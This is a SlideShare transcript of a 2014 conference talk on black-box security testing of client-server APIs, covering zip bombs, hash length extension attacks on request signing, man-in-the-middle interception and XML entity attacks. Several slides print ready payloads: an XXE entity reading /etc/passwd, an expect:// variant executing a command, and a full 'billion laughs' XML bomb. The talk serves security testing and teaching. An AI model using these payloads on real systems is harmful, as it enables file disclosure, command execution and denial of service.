Your SlideShare is downloading. ×
CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверного API
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Introducing the official SlideShare app

Stunning, full-screen experience for iPhone and Android

Text the download link to your phone

Standard text messaging rates apply

CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверного API

1,018
views

Published on


0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,018
On Slideshare
0
From Embeds
0
Number of Embeds
5
Actions
Shares
0
Downloads
6
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Pentesting client/server API Sergey Belov
  • 2. $ whoami © 2002—2014, Digital Security 2 • Senior Security Auditor at Digital Security • BugHunter: Google, Yandex, Badoo, Yahoo +++ • Writer: habrahabr, ”Xakep” magazine • CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013 • Speaker: CodeFest 2012, ZeroNights 0x03 • Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
  • 3. What we are talking about? © 2002—2014, Digital Security 3 API
  • 4. What we are talking about? © 2002—2014, Digital Security 4 API
  • 5. Hacking via API © 2002—2014, Digital Security 5
  • 6. Hacking via API © 2002—2014, Digital Security 6
  • 7. Hacking via API © 2002—2014, Digital Security 7 From interface to API methods
  • 8. Hacking via API © 2002—2014, Digital Security 8
  • 9. Hacking via API © 2002—2014, Digital Security 9
  • 10. Hacking via API © 2002—2014, Digital Security 10
  • 11. Hacking via API © 2002—2014, Digital Security 11
  • 12. Hacking via API © 2002—2014, Digital Security 12 What we are should to test? • Logic! • Bypassing restrictions (sqli/xss) • Parameter tampering Developing • Stop hacks and custom realization in API! Really
  • 13. Hacking via API © 2002—2014, Digital Security 13
  • 14. Hacking via API © 2002—2014, Digital Security 14 ZIP
  • 15. Hacking via API © 2002—2014, Digital Security 15 42 kb….
  • 16. Hacking via API © 2002—2014, Digital Security 16 42 kb…. …10 GB?
  • 17. Hacking via API © 2002—2014, Digital Security 17 42 kb…. …10 GB? …100 GB?
  • 18. Hacking via API © 2002—2014, Digital Security 18 42 kb…. …10 GB? …100 GB? …100 TB?
  • 19. Hacking via API © 2002—2014, Digital Security 19 42 kb…. …10 GB? …100 GB? …100 TB? …4,5PB! http://www.unforgettable.dk/
  • 20. Hacking via API © 2002—2014, Digital Security 20 Say HELLO to ZIP BOMB!
  • 21. Hacking via API © 2002—2014, Digital Security 21 Evil of javascript and
  • 22. Hacking via API © 2002—2014, Digital Security 22
  • 23. Hacking via API © 2002—2014, Digital Security 23
  • 24. Hacking via API © 2002—2014, Digital Security 24 http://habrahabr.ru/post/186160/
  • 25. Hacking via API © 2002—2014, Digital Security 25 Crypto
  • 26. Hacking via API © 2002—2014, Digital Security 26 Query signing Sign = sha*(…+DATA+…) api key
  • 27. Hacking via API © 2002—2014, Digital Security 27
  • 28. Hacking via API © 2002—2014, Digital Security 28 But why?
  • 29. Hacking via API © 2002—2014, Digital Security 29 Say hello again. To length extension attack
  • 30. Hacking via API © 2002—2014, Digital Security 30 A=1&B=2&C=3 07ce36c769ae130708258fb5dfa3d37ca5a67514 TOKEN=sha1(KEY+DATA)
  • 31. Hacking via API © 2002—2014, Digital Security 31 Some has hijacked just 1 request…
  • 32. Hacking via API © 2002—2014, Digital Security 32 What attacker know? • Original data • Sign (token)
  • 33. Hacking via API © 2002—2014, Digital Security 33 What attacker want? Change some data / change params
  • 34. Hacking via API © 2002—2014, Digital Security 34 A=1&B=2&C=3x80x00x00…x02&C=4
  • 35. Hacking via API © 2002—2014, Digital Security 35 Can sign new query without api key! Vkontakte: sig = md5(name1=value1name2=value2api_secret) Mail.RU sig = md5(uid + params + private_key) http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
  • 36. Hacking via API © 2002—2014, Digital Security 36 Request hijacking… How?
  • 37. Hacking via API © 2002—2014, Digital Security 37
  • 38. Hacking via API © 2002—2014, Digital Security 38
  • 39. Hacking via API © 2002—2014, Digital Security 39
  • 40. Hacking via API © 2002—2014, Digital Security 40
  • 41. Hacking via API © 2002—2014, Digital Security 41
  • 42. Hacking via API © 2002—2014, Digital Security 42
  • 43. Hacking via API © 2002—2014, Digital Security 43
  • 44. Hacking via API © 2002—2014, Digital Security 44
  • 45. Hacking via API © 2002—2014, Digital Security 45 XML? XML entities!
  • 46. Hacking via API © 2002—2014, Digital Security 46 DTD Example: <!ENTITY writer "Donald Duck."> <!ENTITY copyright "Copyright W3Schools."> XML example: <author>&writer;&copyright;</author>
  • 47. Hacking via API © 2002—2014, Digital Security 47 XML entities? External Entity!
  • 48. Hacking via API © 2002—2014, Digital Security 48 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>
  • 49. Hacking via API © 2002—2014, Digital Security 49 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM “expect://id" >]> <foo>&xxe;</foo>
  • 50. Hacking via API © 2002—2014, Digital Security 50 XML Bombs!
  • 51. Hacking via API © 2002—2014, Digital Security 51 <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
  • 52. What we are talking about? © 2002—2014, Digital Security 52 Man in the Middle
  • 53. Hacking via API © 2002—2014, Digital Security 53 Examples?
  • 54. Hacking via API © 2002—2014, Digital Security 54 2013-11-19 by Reginaldo Silva
  • 55. Hacking via API © 2002—2014, Digital Security 55 https://www.facebook.com/BugBounty/posts/778897822124446 http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
  • 56. Hacking via API © 2002—2014, Digital Security 56 Testing: • https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008) • XXE to RCE https://gist.github.com/joernchen/3623896 Development: • Disable entities
  • 57. Hacking via API © 2002—2014, Digital Security 57 Finally: • Re-test all interface restrictions; • Specific compressions; • JS callbacks; • Crypto + SSL test + hardcoded credentials (hackapp.com); • XML - XXE; • Anything else :]
  • 58. twitter.com/sergeybelove sbelov@dsec.ru © 2002—2014, Digital Security Digital Security в Москве: (495) 223-07-86 Digital Security в Санкт-Петербурге: (812) 703-15-47 58 Hacking via API Thanks for your attention! Questions?